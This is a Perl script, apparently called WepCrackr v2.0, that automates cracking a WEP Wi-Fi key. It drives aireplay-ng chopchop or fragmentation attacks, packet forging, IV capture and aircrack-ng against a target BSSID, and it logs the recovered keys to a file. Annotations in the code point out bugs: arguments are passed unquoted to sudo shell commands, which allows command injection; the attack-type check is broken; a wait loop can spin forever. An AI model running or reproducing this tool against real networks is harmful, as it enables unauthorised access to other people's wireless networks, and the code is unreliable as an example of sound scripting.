#!usr/bin/perl
#2.0 changes: added file checking, recursivity, logfile of cracked APs
# Global switch read by stop() and by the final failure branch at the bottom of
# the file: when set to 1 the script re-executes itself with the same arguments
# after a failed run (no upper bound on retries is enforced anywhere).
$recursive = 0;  # <-- 0 = off, 1 = on (keep trying if no key found)

# Print the ASCII-art banner to the currently selected output handle.
# The heredoc is single-quoted: nothing in it needs interpolation.
sub banner {
   print <<'EOF';
 ________               ______                   __      
|  |  |  |.-----.-----.|      |.----.---.-.----.|  |--.----.
|  |  |  ||  -__|  _  ||   ---||   _|  _  |  __||    <|   _|
|________||_____|   __||______||__| |___._|____||__|__|__|  
 v2.0           |__|                       By Ross Markham  

EOF
   return;
}

# Usage guard: at least six positional arguments are required; the optional
# seventh (attempt counter) is supplied only by the self re-exec.
if (scalar @ARGV < 6) {
   system("clear");
   banner();
   print <<'EOF';
Usage (as root): 
perl wepcrackr.pl <BSSID> <channel> <ESSID> <mac> <card> <4/5>
      (4 = chopchop attack, 5 = fragmentation attack)

EOF
   exit;
}

# Delete the artefacts of a previous run from the current working directory.
# Each name is handed to a shell via sudo, so the two wildcard entries are
# expanded by the shell relative to wherever the script was started.
sub clean {
   for my $artefact (qw(arp-request capture*.* replay_*.* cracked_wep.txt wpa_supplicant.conf)) {
      system("sudo rm -rf $artefact");
   }
   return;
}

# Abort path: clean up, report failure and either re-exec the script (when the
# global $recursive is 1) or exit. The re-exec line builds a shell command from
# the global argument values exactly as they were received, without quoting.
sub stop {
   print "[+] Cleaning up... again \n";
   clean();
   print "[+] Recursivity disabled in source (line 3) \n" if $recursive == 0;
   print "[-] Cracking WEP failed \n";
   exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt") if $recursive == 1;
   exit;
}

# Positional arguments into package globals. The usage check above only
# guarantees the first six; $attempt is undef unless the script re-exec'd
# itself. No value is validated or quoted before later shell interpolation.
($bssid, $channel, $essid, $mac, $interface, $attack, $attempt) = @ARGV[0 .. 6];

system("clear");
banner();

# Attempt bookkeeping for the self re-exec: report the current count and bump
# it; a first run (no seventh argument) starts the counter at 2.
if ($attempt > 0) {
   print "[+] Attempt no. $attempt \n";
   $attempt += 1;
}
$attempt ||= 2;

print "[+] Cleaning before cracking \n";
clean();

# Write a minimal wpa_supplicant configuration into the working directory.
# The open is unchecked (as before): on failure the prints are silently lost.
# $essid and $bssid are written verbatim; a quote character in $essid would
# break the generated file.
open my $cfg_fh, '>', 'wpa_supplicant.conf';
print {$cfg_fh} <<"CONF";
network={
        ssid="$essid"
        key_mgmt=NONE
        bssid=$bssid
        wep_key0="fakekey"
}
CONF
close $cfg_fh;

# Process tree: the first child runs wpa_supplicant inside an xterm; the parent
# then drives the remaining tools, forking two more xterm children. Every
# command below is a single string passed to the shell with the command-line
# arguments interpolated verbatim and unquoted (see the @ARGV assignments
# above), so the arguments are effectively trusted input.
# NOTE(review): none of the exec() children exit on failure. If an exec fails
# (e.g. xterm missing) the child returns here and continues running the
# parent's code from the "open(KEY ..." section onward, in duplicate. The
# failed-fork branch likewise falls through to that section.
if (!defined($pid = fork())) {
   print "resources not avilable.\n";
} elsif ($pid == 0) {
      # `use` is compile-time and applies to the whole file, not only here.
      use Cwd qw(realpath);
      # Drops the last 12 characters of the script's resolved path, i.e. the
      # filename when the script is called "wepcrackr.pl" (12 characters);
      # under any other name the computed directory is wrong.
      my $fullpath = substr(realpath($0), 0, -12);
      exec("xterm -e sudo wpa_supplicant -c".$fullpath."wpa_supplicant.conf -Dwext -i$interface");
} else {
   print "[+] Associating with $essid \n";
   sleep 2;
   if ($attack == 4){ print "[+] Performing chopchop attack \n"; }
   if ($attack == 5){ print "[+] Performing fragmentation attack \n"; }
   # (4||5) is a boolean-or expression whose value is 4, so this guard only
   # accepts $attack == 4; a value of 5 is reported as unsupported despite the
   # message and the print above.
   if ($attack != (4||5)){ 
      print "[-] Only attack types 4 & 5 supported \n"; 
      # SIGTERM goes to the xterm child; whether the sudo'd process inside it
      # terminates with the xterm is not established here.
      kill 15, $pid;
      &stop;
   }
   # $attack is interpolated directly as the option letter. Note the interface
   # is hard-coded to mon0 here while wpa_supplicant above uses $interface.
   system("xterm -e sudo aireplay-ng -$attack -F -h $mac -a $bssid mon0");
   # <replay_*.xor> is itself a glob; glob() is applied to its result.
   if (!glob<replay_*.xor>){ 
      print "[-] Replay_*.xor couldn't be found!\n"; 
      kill 15, $pid;
      &stop;
   }
   print "[+] ";
   system("sudo packetforge-ng -0 -h $mac -a $bssid -k 255.255.255.255 -l 255.255.255.255 -y replay_*.xor -w arp-request mon0");
      if (!defined($airodumpid = fork())) {
         die "cannot fork: $!";
      } elsif ($airodumpid == 0) {
         print "[+] Capturing IV's \n";
         exec("xterm -e sudo airodump-ng -c $channel --bssid $bssid -w capture mon0");  
      } else {
         if (!defined($aireplayid = fork())) {
            die "cannot fork: $!";
         } elsif ($aireplayid == 0) {
            print "[+] Sending ARP requests \n";
            exec("xterm -e sudo aireplay-ng -2 -F -r arp-request mon0");
         }else{
            print "[+] Cracking IV's \n";
            # Busy-wait with no sleep and no timeout: spins at full CPU until
            # capture-01.cap is non-empty and capture-01.txt exists. If the
            # capture child never produces them this loop never ends.
            $filehasdata = 0;
            while ($filehasdata == 0){
               if ( (-s "capture-01.cap") && (-e "capture-01.txt") ){ $filehasdata = 1; }
            }
            # Output is redirected to cracked_wep.txt, which is parsed below.
            system("sudo aircrack-ng -q -b $bssid capture*.cap > cracked_wep.txt");
            print "[+] Killing threads \n";
            kill 15, $aireplayid;
            kill 15, $airodumpid;
            kill 15, $pid;
         }
      }
}

# Scan the aircrack output for the "KEY FOUND" line; the text after its first
# 11 characters becomes $wep_key (the last matching line wins). The open is
# unchecked as before: a missing file simply leaves $wep_key undefined.
open my $key_fh, '<', 'cracked_wep.txt';
while (my $line = <$key_fh>) {
   chomp $line;
   $line =~ tr/a-z/A-Z/;
   next unless $line =~ m/KEY FOUND/;
   $wep_key = substr($line, 11);
}
close $key_fh;

print "[+] Cleaning up... again \n";
clean();

# Success: append the result to the log file (open unchecked, as before) and
# report it. Failure: mirror stop()'s messages and optionally re-exec with the
# raw argument values interpolated into a shell command.
if ($wep_key) {
   open my $log_fh, '>>', 'wireless_cracked.txt';
   print {$log_fh} "BSSID: $bssid \n",
                   "ESSID: $essid \n",
                   "channel: $channel \n",
                   "key: $wep_key \n\n";
   close $log_fh;
   print "[!] Wep key: $wep_key \n";
}
else {
   print "[+] Recursivity disabled in source (line 3) \n" if $recursive == 0;
   print "[-] Cracking WEP failed \n";
   exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt") if $recursive == 1;
}